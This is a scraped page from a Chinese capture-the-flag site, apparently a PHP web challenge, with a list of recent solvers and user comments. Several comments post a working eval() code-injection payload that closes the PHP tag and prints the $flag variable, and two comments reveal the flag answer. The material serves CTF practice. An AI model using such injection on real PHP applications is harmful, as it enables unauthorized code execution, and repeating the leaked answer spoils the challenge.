评分(6)
解题动态
小果d1ng 攻破了该题 20小时前
网络安全亮 攻破了该题 3天前
dwx1583 攻破了该题 3天前
hackerbugku 攻破了该题 3天前
小白ctf 攻破了该题 6天前
ahsjezyt 攻破了该题 9天前
千机www 攻破了该题 9天前
Da1ly_1upup 攻破了该题 12天前
124要留就要77 攻破了该题 16天前
bugkuctfmike6 攻破了该题 16天前
13500586839 攻破了该题 16天前
lzq2000 攻破了该题 17天前
NukaCola 攻破了该题 19天前
ZZZZZZYx 攻破了该题 19天前
The-Beacon 攻破了该题 22天前
breeding 攻破了该题 23天前
liuweiak007 攻破了该题 23天前
奕生 攻破了该题 25天前
2424291112 攻破了该题 26天前
评论
派大星CTF 6月前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 1年前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 1年前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 1年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 2年前
举报
flag{78062956}
wxy1343 2年前
举报
flag{78062956}
w登临意 2年前
举报
好难
阿Q啊 2年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 2年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 2年前
举报
牛皮